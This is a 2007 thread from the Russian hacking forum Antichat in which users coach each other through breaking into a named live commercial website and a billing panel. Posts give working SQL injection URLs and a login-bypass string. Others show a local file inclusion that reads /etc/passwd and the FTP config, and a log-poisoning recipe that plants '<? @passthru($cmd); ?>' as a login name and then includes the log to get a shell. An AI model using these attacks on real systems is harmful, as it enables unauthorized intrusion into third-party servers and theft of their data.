Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Панель Управления Счетами - BPanel v2.8 Beta2 SE (https://forum.antichat.xyz/showthread.php?t=40543)

Liar 21.05.2007 17:47
Панель Управления Счетами - BPanel v2.8 Beta2 SE
 
Вот есть такая панель с демо входом, находится на хостинге, при подстановки в адресную строку:
http://****host.net/billing/faq.php?category=1&identry=1&mod=comment&start=1'

появляется эта надпись:
Так, а вот ломать скрипт нельзя!
Тренируйся лучше на... кошках :)
пробывал на XSS не чего не изменяется
на данном сайте нет не форума не гостивой....
что небуть подскажите куда двигаться в плане взлома.

fly 22.05.2007 01:09
Nmap -- проверь сервиса!
Чекни на domainsdb.net --может есть еще сайты на сервере.
Кста там не Abills billing system <= 0.24.f2, если да , то топай на -- http://nst.void.ru/?q=papers&cat_where=advisories&show=23

Liar 22.05.2007 02:39
Нет там стоит BPanel v2.8 Beta2 SE, на остальных сайтах пока я просмотрел 15 везде статические страници, не одной динамической , (не формов не чего)

Liar 22.05.2007 03:55
http://biznesprom.ru/index.php?categoryID=-6761'
появляется эта ошибка:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

при вводе:http://biznesprom.ru/index.php?categoryID=-6761+union+select+1/*
всё нормально

а при вводе: http://biznesprom.ru/index.php?categoryID=-6761+union+select+1,2/*

http://biznesprom.ru/index.php?categoryID=-6761+union+select+1,2/*

blackybr 22.05.2007 07:49
http://biznesprom.ru/index.php?categoryID=-6761+union+select+31337/*

скл иньекция есть. но к сожалению не выводит ничего.

А вот в логине есть скуль, позволяющая обойти авторизацию

Liar 22.05.2007 15:05
Это как нибуть связанно с этим кодом:
PHP код:
<form action="index.php" method=post>

<tr>
 <td>
    <table border=0>
     <input type="hidden" name="enter" value="1">
     <tr>
        <td align=right><font class=light>Логин:</font></td>
        <td><input type="text" class=ss name="user_login" size=10></td>
     </tr>
     <tr>
        <td align=right><font class=light>Пароль:</font></td>
        <td><input name="user_pw" class=ss type="password" size=10></td>
     </tr
в смысле мне надо в командную строку в браузере вводить запрос или можно в само форму авторизации , сейчас попробывал вставлять : ""or "1"="1" не чего не получилось , ну чтож буду сейчас учить матчасть ( читать статьи)

p-range 22.05.2007 16:25
локальный инклуд:
Цитата:
http://biznesprom.ru/index.php?aux_page=../../../../../../../../../../../../../etc/passwd
что делать дальше, думаю, знаете сами.

Liar 22.05.2007 18:39
Пробывал подставлять и :
http://biznesprom.ru/index.php?aux_page=../orderform/letter/contacts.php

и остальные варианты с раширением php показывет что
"""""""""""""""""""""""""""""""""""""""""""""""""" """"""""""""""""""""""""
Извините, запрашиваемый документ не был найден на сервере
"""""""""""""""""""""""""""""""""""""""""""""""""" """"""""""""""""""""""""

но при этом при вставке:
http://biznesprom.ru/index.php?aux_page=../images/design/n_02.jpg
показует составляющую рисунка (исходник не знаю какправильно назвать)
удалённо тоже не чего не инклудится , тоесть локальный инклуд ?
пробыва добовлять в конец %00 тоже без результатно ,
брут не подходит так как сижу на диалупе.

blackybr 22.05.2007 20:33
Ядовитый 0 работает.. то есть, что можем из этого извлечь. МЫ находим любые логи (возбмем к примеру логи фтп-шника или сервера (для поисков логов фтпшника нам в помощь приходи http://biznesprom.ru/index.php?aux_page=../../../../../../../../../../../../../etc/proftpd.conf ) .. затем.. если фтп - то .. пытаемся залогиниться на сервер с логином.. ну например <? @passthru($cmd); ?> ... что естественно отображается в логах (неправтльный лог.. значит в еррор-логе) . Инклудим лог, ставим %00 , и у нас есть полноценный шелл.

p-range 22.05.2007 23:16
blackybr, там и без %00 все работает, т.к. расширения нет.


Время: 08:42